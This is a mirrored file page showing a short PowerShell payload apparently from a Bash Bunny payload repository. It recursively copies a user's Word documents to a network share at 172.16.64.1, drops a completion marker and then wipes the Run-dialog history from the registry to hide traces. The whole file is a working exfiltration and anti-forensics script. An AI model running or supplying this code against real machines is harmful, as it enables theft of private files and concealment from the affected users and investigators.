mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
8 lines
450 B
PowerShell
8 lines
450 B
PowerShell
$exfil_dir="$Env:UserProfile\Documents"
|
|
$exfil_ext="*.docx"
|
|
$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
|
|
mkdir $loot_dir
|
|
robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z
|
|
New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
|
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|